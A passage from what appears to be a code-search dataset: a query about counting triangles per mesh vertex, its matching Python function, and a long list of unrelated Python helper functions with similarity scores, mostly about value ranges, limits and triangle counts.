((MV.ONE,),) + MV.blades[1:]\n\t# return ((MV.ONE,),) + MV.bases[1:]", "def _get_limits(robot, limit_type):\n target_ctrl_path = get_target_ctrl_path(robot)\n\n limits = {}\n\n # Check if the rig has attributes for the input limit type\n # If not, add the corresponding limit attributes\n # This is mostly used for backwards-compatibility\n\n if not pm.attributeQuery('axis{}Limits'.format(limit_type),\n n=target_ctrl_path, ex=True):\n add_limits_to_robot(robot, limit_type)\n\n # HARD CODED - Number of robot axes; should include external axes\n num_axes = 6\n\n # Create a list of robot's limits\n for i in range(num_axes):\n axis_number = i + 1 # Axis numbers are 1-indexed\n axis_name = 'Axis {}'.format(axis_number)\n limits[axis_name] = {'Min Limit': None, 'Max Limit': None}\n\n try:\n limit = pm.getAttr(target_ctrl_path + '.axis{}' \\\n '{}Limit'.format(axis_number, limit_type))\n except AttributeError:\n limit = None\n\n if limit:\n limits[axis_name] = {'Min Limit': -limit,\n 'Max Limit': limit}\n \n # TO-DO: Add external axes\n return limits", "def planets_in_range(self):\n\n query_string = \"SELECT * from planets_in_range;\"\n\n # Perform query\n self.conn_cur.execute(query_string)\n results = self.conn_cur.fetchall()\n\n # Build dictionary\n ranges = {}\n for row in results:\n ranges[row[0]] = row[1]\n\n return ranges", "def dict_time(self, workspace_unique_id=None, subset_unique_id=None, request=None):\n workspace_object = self._get_workspace_object(unique_id=workspace_unique_id) \n subset_object = workspace_object.get_subset_object(subset_unique_id) \n if not subset_object:\n self._logger.warning('Could not find subset object {}. Subset is probably not loaded.'.format(subset_unique_id))\n return {}\n\n data_filter_object = subset_object.get_data_filter_object('step_1')\n if request:\n data_filter_object.set_filter(filter_type='include_list', \n filter_name='MYEAR', \n data=request['year_range'])\n# data_filter_object.set_filter(filter_type='include_list', \n# filter_name='MONTH', \n# data=request['month_list'])\n \n else:\n year_list = sorted(map(int, data_filter_object.get_include_list_filter('MYEAR')))\n# month_list = sorted(map(int, data_filter_object.get_include_list_filter('MONTH')))\n \n return {\"year_range\": [year_list[0], year_list[-1]]}#, \"month_list\": month_list}", "def get_range(self) -> tuple[int, int]:\n return self.range_from, self.range_to", "def get(self, _min_value, _max_value):\n \n result = dict()\n for k in self.objects.keys():\n if self.objects[k][0] >= _min_value[0] and\\\n self.objects[k][1] >= _min_value[1] and\\\n self.objects[k][0] < _max_value[0] and \\\n self.objects[k][1] < _max_value[1]:\n result[k]=self.objects[k]\n return result", "def get_ranges(self) -> typing.List[typing.Tuple[float, float]]:\n return self.ranges[:]", "def m_to_range(self, data):\n return (data - self._min_range_m) / self._total_range", "def f1Q_simultaneous_RBs(self) -> Dict[int, Optional[float]]:\n return {qs.id: qs.f1Q_simultaneous_RB for qs in self.qubits_specs}", "def get_cytobands(bt, cyto_bed):\n\n chrom = bt[0].chrom\n bands = sorted(list(set([x[-2] for x in bt.intersect(cyto_bed, wb=True)])))\n if len(bands) > 1:\n bandrange = '{}{}-{}'.format(chrom, bands[0], bands[-1])\n else:\n bandrange = chrom + bands[0]\n\n return bandrange", "def limits(array, names):\n\n args = ['%s(%s)' % (f, n)\n for n in names\n for f in ['min', 'max']]\n result = array.afl.aggregate(array, *args).toarray()\n return dict((n, (int(result['%s_min' % n][0]), int(result['%s_max' % n][0])))\n for n in names)", "def parse_range_set(range_string):\n # TODO: add UTs for this.\n\n # Parse a range string as specified by format_range_set() below\n # Be generous dealing with duplicate entries in the specification.\n if not range_string:\n return []\n ranges = [\n (lambda sublist: range(sublist[0], sublist[-1] + 1))\n (list(map(int, subrange.split('-')))) for subrange in range_string.split(',')]\n return list(set([y for x in ranges for y in x]))", "def EM_gain_range(self):\n mini, maxi = ct.c_int(), ct.c_int()\n self.lib.GetEMGainRange(ct.pointer(mini), ct.pointer(maxi))\n\n return (mini.value, maxi.value)", "def get_my_mutations(quality_cutoff, coverage_cutoff):\n\n # my_mutations = {}\n # with open('/home/perry/Projects/loh/working/murim.exome.aa_chg.vars') as f:\n # for line in f:\n # my_mutations[line.strip()] = True\n # return my_mutations\n\n bed_file = 'data/nimblegen/2.1M_Human_Exome_Annotation/2.1M_Human_Exome.bed'\n bed_chr2st2end, bed_chr2posLs = bed_tools.load_bed(bed_file, \n 'NimbleGen Tiled Regions')\n # NimbleGen Tiled Regions\n # Target Regions\n\n use_data_dir = '/home/perry/Projects/loh/data/all_non_ref_hg18/'\n all_somatic = {}\n all_inherited = {}\n cancer_qualities = mutations.get_consensus_qualities(use_data_dir + 'yusanT.ann')\n normal_qualities = mutations.get_consensus_qualities(use_data_dir + 'yusanN.ann')\n for exome in global_settings.exome_types:\n data_file = use_data_dir + exome\n inherited, somatic, murim = mutations.get_mutations(data_file, normal_qualities,\n cancer_qualities, quality_cutoff,\n False, coverage_cutoff)\n # only use the bed_tools NimbleGen\n # restriction for hg18 data\n for s in somatic['yusan']: \n chr, pos = s.split(':')\n if bed_tools.find_location_in_bed(chr, int(pos), \n bed_chr2posLs,\n bed_chr2st2end):\n all_somatic[s] = True\n for i in inherited['yusan']: \n chr, pos = s.split(':')\n if bed_tools.find_location_in_bed(chr, int(pos), \n bed_chr2posLs,\n bed_chr2st2end):\n all_inherited[i] = True\n return (set(all_somatic.keys()) & set(get_murim_covered(quality_cutoff)), set(all_inherited.keys()) & set(get_murim_covered(quality_cutoff)))", "def createBins():\n theBins = []\n startFreq = 60\n for a in range(32):\n endFreq = int(startFreq*1.12+12)\n theRange = (startFreq, endFreq)\n startFreq = endFreq\n theBins.append(theRange)\n return(theBins)", "def backbone(self):\n\n bb = self.get(lambda x, name=self._bbname,type=self._bbtype:\n x.name in name and x.element in type)\n if bb is None: return AtomSet( [] )\n else: return bb", "def _build_memorymap(self):\n\t\tmemorymap = {}\n\t\ttotalsize = 0\n\t\tbaserva = self.liststream64.DirectoryData.BaseRva\n\t\tmmdscrptr64 = self.liststream64.DirectoryData.MINIDUMP_MEMORY_DESCRIPTOR64\n\t\tnumberofmemoryranges = self.liststream64.DirectoryData.NumberOfMemoryRanges\n\t\tfor i in range(numberofmemoryranges):\n\t\t\tmemorymap[mmdscrptr64[i].StartOfMemoryRange] = ((baserva + totalsize),mmdscrptr64[i].DataSize)\n\t\t\ttotalsize += mmdscrptr64[i].DataSize\n\t\treturn memorymap", "def range(self):\n lows, highs = [], []\n for graph in self._graphs.values():\n low, high = graph.range()\n lows.append(low)\n highs.append(high)\n return (min(lows), max(highs))", "def range_8(configuration):\n range_dict_all = {\n # updated aLIGO design sensitivity range from 197.5 to 181.5 Mpc on 9 Apr 2018 to reflect T1800044-v4\n \"HL\" : {'H1' : 181.5, 'L1' : 181.5},\n \"HLV\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3 },\n \"HLVK\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, 'K1' : 160.0},\n \"HLVKI\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, 'K1' : 160.0, 'I1' : 181.5},\n \"GW170817\" : {'H1': 107/2.26 *1.26 , 'L1': 218/2.26, 'V1': 58/2.26}, # 1.26 is the improvement factor for H1's range due to data processing.\n \"GW170817_without_Virgo\" : {'H1': 107/2.26 *1.26 , 'L1': 218/2.26},\n \"GW170814\" : {'H1': 53, 'L1': 98, 'V1': 26}, # 1.26 is the improvement factor for H1's range due to data processing.\n \"design\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3 },\n \"early\" : {'H1' : 60., 'L1': 60.},\n \"half_ligo\" : {'H1' : 99, 'L1' : 99, 'V1': 128.3 },\n \"half_virgo\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 64 },\n \"nosrm\" : {'H1' : 159, 'L1' : 159, 'V1': 109 },\n \"india\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 },\n \"kagra\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 , \\\n \"K1\" : 160.0},\n \"bala\" : {'H1' : 181.5, 'H2' : 181.5, 'L1' : 181.5, 'V1': 128.3, \\\n \"I1\" : 181.5 , \"K1\" : 160.0},\n \"sa\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 , \\\n \"K1\" : 160.0, \"S1\":181.5},\n \"sa2\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 , \\\n \"K1\" : 160.0, \"S1\":181.5},\n \"steve\" : {'H1' : 160.0, 'L1' : 160.0, 'V1': 160.0, \"I1\" : 160.0 },\n \"s6vsr2\" : {'H1' : 20., 'L1' : 20., 'V1': 8. }\n }\n return(range_dict_all[configuration])", "def value_ranges(self, attributes):\n ranges = []\n for attribute in attributes:\n if not attribute.is_continuous():\n raise inv.InvalidDataError('Cannot discretise non continuous attribute ' + attribute.name)\n values = self.values_grouped_by_attribute(attributes)\n for value in values: #each entry in values is the range of values for a particular attribute\n value.sort()\n ranges.append(r.Range(value[0], value[-1], True))\n return ranges", "def _get_params_ranges(task: str,) -> Dict[str, Any]:\n params_file = os.path.join(\n os.path.dirname(__file__), \"params\", \"xgboost.yml\"\n )\n params = utils.read_yaml(params_file)\n\n if \"regression\" in task.lower():\n params.update({\"objective\": \"reg:squarederror\"})\n return params\n if \"binary\" in task.lower():\n params.update({\"objective\": \"binary:logistic\"})\n return params\n raise ValueError(f\"{task} is not a supported task.\")", "def get_recordrange(self):\r\n if self.version >= 10.1:\r\n querystr = \"\"\"?where=&outFields=*&returnGeometry=false&returnIdsOnly=false&returnCountOnly=false&orderByFields=&groupByFieldsForStatistics=&outStatistics=[{%0D%0A++++\"statisticType\"%3A+\"count\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidcount\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"min\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmin\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"max\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmax\"%0D%0A++}]&returnZ=false&returnM=false&returnDistinctValues=false&f=pjson\"\"\"\r\n req = requests.get(self.endpointurl + querystr)\r\n self.recordinfo = req.json()[\"features\"][0][\"attributes\"]\r\n\r\n elif self.version < 10.1:\r\n querystr = \"\"\"?text=&geometry=&geometryType=esriGeometryPoint&inSR=&spatialRel=esriSpatialRelIntersects&relationParam=&objectIds=&where=objectid+>+-1&time=&returnCountOnly=true&returnIdsOnly=false&returnGeometry=false&maxAllowableOffset=&outSR=&outFields=&f=pjson\"\"\"\r\n req = requests.get(self.endpontquerystr + qs)\r\n self.recordinfo = {\"oidmin\": 0, \"oidmax\": req.json()[\"count\"]}\r\n\r\n [\r\n self.iterlist.append([x, x + 999])\r\n for x in range(\r\n self.recordinfo[\"oidmin\"]\r\n if self.recordinfo[\"oidmin\"] != self.recordinfo[\"oidmax\"]\r\n else 1 - self.recordinfo[\"oidmin\"],\r\n self.recordinfo[\"oidmax\"],\r\n 1000,\r\n )\r\n ]", "def get_dict_from_range(self, start=None, end=None):\n df = self.from_range(self.data, self.factor, start, end, self.lowpass)\n new_source_data = df.to_dict(orient=\"list\")\n new_source_data[\"index\"] = df.index\n for k in list(new_source_data):\n if isinstance(k, tuple):\n new_source_data[\"_\".join(k)] = new_source_data.pop(k)\n\n return new_source_data", "def calcBRange(c,n=10):\n \n bMin = -abs(c)/2.0 \n bMax = abs(c)/2.0 \n return np.linspace(bMin,bMax,n)", "def get_z_ranges(self):\n\n summary = self.get_rasters_summary()\n\n # Convert to dict in format:\n # { 'stat' : { 'z': (min, max), ... } ... }\n\n ranges = summary.groupby(['stat', 'z'], as_index=False)\n ranges = ranges.agg({'min': 'min', 'max': 'max'})\n ranges['vals'] = ranges.apply(\n lambda row: {\n row['z']: (row['min'], row['max'])\n }, axis=1)\n ranges = ranges.groupby('stat')['vals'].apply(\n lambda group: group.values)\n ranges = ranges.apply(\n lambda group: {\n int(k): v for d in group for k,\n v in d.items()})\n\n return ranges.to_dict()", "def get_hyperparameter_bounds():\n minf = float(\"-inf\")\n inf = float(\"inf\")\n params = dict(mu=(minf,inf), nu=(0.0 ,inf), r=(0.0, inf), s=(0.0, inf))\n return params", "def getAgeRange(brand):\n from numpy import arange, append\n \n # search dictionary for tuple containing age limits (min, max, delta)\n #age_limits = age_range[brand]\n \n # hard code age range properties (temporary)\n if brand in ['Lyon', 'Lyon10', 'Lyon19']:\n ages = 10.0**arange(6.0, 10.1, 0.1)\n elif brand in ['DMESTAR', 'DSEP14', 'DSEP08', 'DSEP']:\n ages = arange(1.0e6, 20.0e6, 1.0e5) \n ages = append(ages, arange(2.0e7, 1.001e8, 5.0e6))\n elif brand in ['Pisa']:\n ages = arange(1.0e6, 20.0e6, 1.0e6)\n ages = append(ages, arange(2.0e7, 1.001e8, 5.0e6))\n elif brand in ['Yale', 'Yale13', 'BAton']:\n ages = arange(1.0e6, 2.0e7, 2.0e5)\n ages = append(ages, arange(2.0e7, 1.0e8, 5.0e6))\n else:\n ages = 0.0\n \n return ages", "def getFeHRange(brand):\n return feh_range[brand]", "def area(minRA, maxRA, minDec, maxDec):\n\n return dict(zip(['minRA', 'maxRA', 'minDec', 'maxDec'], [minRA, maxRA, minDec, maxDec]))", "def get_config(self): # To support serialization\n return {\"min value\": self.minval, \"max value\": self.maxval}", "def SETOBS(start, end):\n session = Session(engine)\n # Query all passengers\n\n SETBOS = session.query(Measurement.date, func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= end).group_by(Measurement.date).all() \n\n # Convert list of tuples into normal list\n all_SETOBS = list(np.ravel(SETBOS))\n\n return jsonify(all_SETOBS)", "def parse_ranges(ranges, expand=True):\n pairs = ranges.split(' ')\n content = {}\n for key, value in [pair.split('=') for pair in pairs if '=' in pair]:\n content[key] = parse_range_once(value, expand)\n return content" ]
[ "0.59818125", "0.5639009", "0.5639009", "0.5624772", "0.5565236", "0.5513016", "0.5494546", "0.5442198", "0.54400784", "0.5380527", "0.5366019", "0.5358748", "0.5318177", "0.5313223", "0.52917475", "0.5266361", "0.5262664", "0.5223182", "0.5186198", "0.517666", "0.5118012", "0.51148266", "0.51148266", "0.51148266", "0.51148266", "0.5109687", "0.5102881", "0.50763667", "0.50756514", "0.5072759", "0.5072759", "0.5072759", "0.5072759", "0.5045249", "0.5043399", "0.5023693", "0.50052595", "0.4988633", "0.4988633", "0.498708", "0.4984921", "0.4982452", "0.4981665", "0.4981665", "0.49786368", "0.4964445", "0.4953378", "0.4930351", "0.49109262", "0.49091402", "0.49071664", "0.49064443", "0.490628", "0.49061376", "0.49007428", "0.4898019", "0.48885", "0.48766676", "0.48562163", "0.484985", "0.4848712", "0.48439667", "0.4841173", "0.484104", "0.48381698", "0.4833407", "0.48189518", "0.4813048", "0.48087043", "0.48070675", "0.4805858", "0.47974396", "0.4796646", "0.4794392", "0.47937232", "0.4792211", "0.4779179", "0.47755167", "0.4770627", "0.4764661", "0.4760232", "0.47424707", "0.473834", "0.4730006", "0.47275013", "0.47259507", "0.47217327", "0.47199056", "0.47149846", "0.47097206", "0.47091854", "0.47029316", "0.46998838", "0.46971732", "0.46919367", "0.46891788", "0.46891215", "0.4682287", "0.46817464", "0.46815357" ]
0.6958238
0
This function will return data about the number of triangles on each vertex in a file inputs
def get_triangles_per_vertex(my_core, native_ranges): t_p_v_data = [] tri_dimension = 2 for vertex in native_ranges[types.MBVERTEX]: t_p_v_data.append(my_core.get_adjacencies(vertex, tri_dimension).size()) return np.array(t_p_v_data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def count_triangles(self, file):\n self.nibble(80)\n return struct.unpack(\"@i\", self.nibble(4))[0]", "def get_num_vertices(triangles):\n return numpy.amax(numpy.reshape(triangles, -1)) + 1", "def count_cells(fpath):\n cells = []\n for i in range(40):\n fname = f\"{fpath}/Mesh2d_{i}.vtu\"\n if not os.path.exists(fname):\n print(f\"File {fname} does not exist.\")\n break\n mesh = meshio.read(fname)\n for cell_block in mesh.cells:\n if cell_block.type in (\"triangle\"):\n num_cells = len(cell_block)\n print(f\"{i:2d}: {num_cells:6d} elements, {len(mesh.points):6d} vertices\")\n cells.append(num_cells)\n continue\n return cells", "def test_triangle_count_05(self):\n body = {\"direction\": \"IN\", \"degree\": -1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_in': 13, 'vertices_in': 9, 'triangles': 2}\n else:\n assert 0", "def test_triangle_count_08(self):\n body = {\"direction\": \"IN\", \"degree\": 1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_in': 13, 'vertices_in': 9, 'triangles': 0}\n else:\n assert 0", "def count_aux(self, infile):\n n_aux = 0\n n_tokens = 0\n dgs_in = self._file_handler.file_to_dg_list(infile)\n for dg in dgs_in:\n n_tokens += len(dg)\n transform = VGtransformer(dg, dep_style=self._dep_style)\n transform.transform()\n n_aux += transform.tot_aux\n return n_aux, n_tokens, len(dgs_in)", "def test_triangle_count_06(self):\n body = {\"direction\": \"OUT\", \"degree\": -1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_out': 13, 'vertices_out': 7, 'triangles': 2}\n else:\n assert 0", "def test_triangle_count_04(self):\n body = {\"direction\": \"OUT\"}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_out': 13, 'vertices_out': 7, 'triangles': 2}\n else:\n assert 0", "def num_data_lines(filepath):\n\tif not file_exists(filepath):\n\t\treturn -1\n\tcount = 0\n\twith open(filepath, 'r') as f:\n\t\twhile read_floats(f):\n\t\t\tcount += 1\n\tf.close()\n\treturn count", "def get_vertices_count(self) -> int:\n # TODO: verify the following claim:\n raise NotImplementedError", "def test_triangle_count_07(self):\n body = {\"direction\": \"OUT\", \"degree\": 1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_out': 13, 'vertices_out': 7, 'triangles': 0}\n else:\n assert 0", "def obtener_cantidad_vertices(self):\n return len(self.vertices.keys())", "def countSamples(filename):\n with open(filename, \"r\") as f:\n line = f.readline().split(\"\\t\")\n return len(line) - 2", "def num_vertices(self):\n return len(self)", "def ss_triangle_count(graph: ScipyGraph) -> int:\n props = ScipyGraph.Type.compute_abstract_properties(graph, {\"edge_type\"})\n if props[\"edge_type\"] == \"map\":\n # Drop weights before performing triangle count\n m = graph.value.copy()\n m.data = np.ones_like(m.data)\n elif props[\"edge_type\"] == \"set\":\n m = graph.value\n L = ss.tril(m, k=-1).tocsr()\n U = ss.triu(m, k=1).tocsc()\n return int((L @ U.T).multiply(L).sum())", "def findTriangles(p):\n triangleCount = 0\n for a in range(3, p//3 + 1):\n for b in range(a+1, p//2):\n c = p - (a+b)\n if (a**2 + b**2) == c**2:\n triangleCount += 1\n return triangleCount", "def num_vertices(self):\n return self.n * (1 + int(self.variant.is_bipartite()))", "def gather_counts(directory):\n counts_un = defaultdict(int)\n counts_bi = defaultdict(int)\n counts_tri = defaultdict(int)\n prev_prev = \"<s>\"\n prev = \"<s>\"\n for filename in os.listdir(f\"./{directory}\"):\n if \".DS_Store\" in filename:\n continue\n with open(f\"./{directory}/{filename}\", \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n counts_un[line+\"\\n\"] += 1\n counts_bi[prev+\"\\n\"+line+\"\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\"+line+\"\\n\"] += 1\n prev_prev = prev\n prev = line\n counts_un[\"</s>\\n\"] += 2\n counts_bi[\"</s>\\n</s>\\n\"] += 1\n counts_bi[prev+\"\\n\"+\"</s>\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\" + \"</s>\\n\"] += 1\n counts_tri[prev+\"\\n</s>\\n</s>\\n\"] += 1\n return counts_un, counts_bi, counts_tri", "def load_data():\n data = []\n with euler.Resource('triangle.txt') as datafile:\n for line in datafile.readlines():\n data.insert(0, map(int, line.strip().split()))\n return data", "def num_vertices(self):\n return len(self.vertices)", "def num_vertices(self):\n return len(self.vertices)", "def return_num_vertices(self):\n return self.__size", "def n_vertices(self):\n try: \n return self._n_vertices\n except AttributeError:\n self._n_vertices = 0\n for v in self.vertex_generator(): self._n_vertices += 1\n return self._n_vertices", "def get_edge_lengths(points: np.ndarray, triangles: np.ndarray) -> np.ndarray:\n edges, _ = get_edges(triangles)\n return np.linalg.norm(np.diff(points[edges], axis=1), axis=2).squeeze()", "def countDataSize(self,filename):\n \n try:\n d = h5py.File(filename,'r')\n except:\n print(filename)\n return \n\n N = 0\n scan_edges = d['level2/Statistics/scan_edges'][:]\n for (start,end) in scan_edges:\n N += (end-start)//self.offsetLen * self.offsetLen\n d.close()\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def _get_las_npoints(fpath):\n with laspy.file.File(fpath) as f:\n return f.header.count", "def std_triangles_count(graph):\n if nx.is_directed(graph):\n raise Exception(\"Graph is not undirected\")\n\n return sum(nx.triangles(graph).values()) // 3", "def total_number():\r\n total_number = 0\r\n file_read = read_file()\r\n for key in file_read:\r\n total_number = total_number + len(file_read[key])\r\n return total_number", "def vertexCount(self):\n return self._nVertices", "def numverts(self):\n return self._numvertstotal", "def getNumVertices(self):\n return len(self.V)", "def num_vertices(self, p):\n ret_val = self._num_vertices(p)\n return ret_val", "def countsubcatchments(inputfilename=FileSettings.settingsdict['inputfilename']):\r\n global count\r\n with open(inputfilename, 'r') as swmmput:\r\n contents = swmmput.readlines()\r\n count = len(contents)\r\n return(count)", "def get_dataset_length(file_path, had_header=True):\n with open(file_path, 'r') as f:\n length = 0\n for _ in f:\n length += 1\n length = length - had_header\n return length", "def get_triangle_count(remote, objectid):\n cmd1 = mmapi.StoredCommands()\n key1 = cmd1.AppendSceneCommand_GetTriangleCount(objectid)\n remote.runCommand(cmd1)\n result_val = mmapi.any_result()\n cmd1.GetSceneCommandResult_GetTriangleCount(key1, result_val)\n return result_val.i", "def get_array_size():\n tg_file = 'NA_CAS_gauges.txt'\n lines = open(tg_file).readlines()\n tg_nbr = len(lines)\n return tg_nbr", "def test_number_of_vertex_elements_in_MESH_chunk(self):\n for O in self.mod.objts.itervalues():\n for M in O.meshes.itervalues():\n self.assertEqual(M.vsize, len(M.vert))", "def num_vertices(self):\r\n return len(self.__graph_dict.keys())", "def countgenes():\n directory = openfile('db_directory.txt')\n no_genes_file = directory+'GENES_IN_HPO.txt'\n GENES_IN_HPO = openfile(no_genes_file)\n #GENES_IN_HPO = openfile(numbergenes_file)\n return int(GENES_IN_HPO)", "def num_vertices(self):\n return self._top_exp.number_of_vertices()", "def n_vertices(self):\n return len(self.minimized_generators())", "def read_off_size(path):\n try:\n with open(path, 'r') as file:\n lines = file.readlines()\n if lines[0] != 'OFF\\n':\n print(path, 'Error: is not an .off file')\n num_vertices, num_faces = tuple(lines[1].split()[:2])\n return int(num_vertices), int(num_faces)\n except IOError:\n print('Error: Failed reading file:', path)", "def count_lines(filename):\n with open(filename, 'r', encoding='utf-8') as file:\n lines_count = int()\n for line in file:\n lines_count += 1\n info_tuple = (filename, lines_count)\n return info_tuple", "def get_vertex_data(\n mesh: object,\n g: BinaryReader,\n v1: int,\n v2: int,\n v3: int,\n v4: int,\n n: int,\n verbose=False,\n):\n for i in range(v1):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v1 v_offset\": v_offset,\n \"v1 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n mesh.skinWeightList.append([0, 0, 0, 1])\n\n for i in range(v2):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v2 v_offset\": v_offset,\n \"v2 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n w1 = g.f(1)[0]\n w2 = 1.0 - w1\n mesh.skinWeightList.append([0, 0, w2, w1])\n\n for i in range(v3):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v3 v_offset\": v_offset,\n \"v3 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n w1 = g.f(1)[0]\n w2 = g.f(1)[0]\n w3 = 1.0 - w1 - w2\n mesh.skinWeightList.append([0, w3, w2, w1])\n\n for i in range(v4):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v4 v_offset\": v_offset,\n \"v4 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n w1 = g.f(1)[0]\n w2 = g.f(1)[0]\n w3 = g.f(1)[0]\n w4 = 1.0 - w1 - w2 - w3\n mesh.skinWeightList.append([w4, w3, w2, w1])", "def vertex_count(self) -> int:\n return len(self._vertex_map)", "def countDataSize(self,filename):\n \n d = h5py.File(filename,'r')\n features = d['spectrometer/features'][:]\n select = self.selectData(features.astype(float), self.ifeature, d)\n N = len(features[select])\n d.close()\n\n N = (N//self.offsetLen) * self.offsetLen\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def read_triangle(f, layers=1):\n # Read nodes\n with open(f + '.node') as h:\n num_nodes = int(h.readline().split(' ')[0])\n node_values = np.zeros((num_nodes, 2), dtype=np.float64)\n for line in h:\n if line[0] == '#':\n continue\n node, x, y = line.split()[:3]\n node_values[int(node) - 1, :] = [float(x), float(y)]\n\n nodes = op2.Set(num_nodes, \"nodes\")\n coords = op2.Dat(nodes ** 2, node_values, name=\"coords\")\n\n # Read elements\n with open(f + '.ele') as h:\n num_tri, nodes_per_tri, num_attrs = [int(x) for x in h.readline().split()]\n map_values = np.zeros((num_tri, nodes_per_tri), dtype=np.int32)\n for line in h:\n if line[0] == '#':\n continue\n vals = [int(x) - 1 for x in line.split()]\n map_values[vals[0], :] = vals[1:nodes_per_tri + 1]\n\n elements = op2.Set(num_tri, \"elements\", layers=layers)\n elem_node = op2.Map(elements, nodes, nodes_per_tri, map_values, \"elem_node\")\n\n return nodes, coords, elements, elem_node", "def bpCount(file):\n amount_bp = len(file)\n return amount_bp", "def size(self):\n num_vert = 0\n num_edg = 0\n for vertex in self.vertices():\n num_vert += 1\n num_edg += len(self.neighbors(vertex))\n return (num_vert, num_edg)", "def part2(fname: dict) -> int:\n return sum(len(set.intersection(*[set(pax) for pax in group])) for group in get_data(fname))", "def number_of_trips(filename): \r\n \r\n with open(filename, 'r') as f_in:\r\n # set up csv reader object\r\n trip_reader = csv.DictReader(f_in)\r\n \r\n # initialize count variables\r\n n_subscribers = 0\r\n n_customers = 0\r\n \r\n # tally up ride types\r\n for row in trip_reader:\r\n if row['user_type'] == 'Subscriber':\r\n n_subscribers += 1\r\n else:\r\n n_customers += 1\r\n \r\n # compute total number of rides\r\n n_total = n_subscribers + n_customers\r\n \r\n # return tallies as a tuple\r\n return(n_subscribers, n_customers, n_total)", "def file_len(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n Nrows = i + 1\n return Nrows", "def n_n(output_path):\n lef = {}\n rig = {}\n rellef = {}\n relrig = {}\n\n triple = open(Path(output_path, \"train2id.txt\"), \"r\")\n valid = open(Path(output_path, \"valid2id.txt\"), \"r\")\n test = open(Path(output_path, \"test2id.txt\"), \"r\")\n\n ls = triple.readlines()\n tot = len(ls) - 1\n\n # (int)(triple.readline())\n for i in range(tot):\n content = ls[i + 1]\n # content = triple.readline()\n h, t, r = content.strip().split()\n if not (h, r) in lef:\n lef[(h, r)] = []\n if not (r, t) in rig:\n rig[(r, t)] = []\n lef[(h, r)].append(t)\n rig[(r, t)].append(h)\n if not r in rellef:\n rellef[r] = {}\n if not r in relrig:\n relrig[r] = {}\n rellef[r][h] = 1\n relrig[r][t] = 1\n\n ls = valid.readlines()\n tot = len(ls) - 1\n # (int)(valid.readline())\n for i in range(tot):\n content = ls[i + 1]\n # content = valid.readline()\n h, t, r = content.strip().split()\n if not (h, r) in lef:\n lef[(h, r)] = []\n if not (r, t) in rig:\n rig[(r, t)] = []\n lef[(h, r)].append(t)\n rig[(r, t)].append(h)\n if not r in rellef:\n rellef[r] = {}\n if not r in relrig:\n relrig[r] = {}\n rellef[r][h] = 1\n relrig[r][t] = 1\n\n ls = test.readlines()\n tot = len(ls) - 1\n # (int)(test.readline())\n for i in range(tot):\n content = ls[i + 1]\n # content = test.readline()\n h, t, r = content.strip().split()\n if not (h, r) in lef:\n lef[(h, r)] = []\n if not (r, t) in rig:\n rig[(r, t)] = []\n lef[(h, r)].append(t)\n rig[(r, t)].append(h)\n if not r in rellef:\n 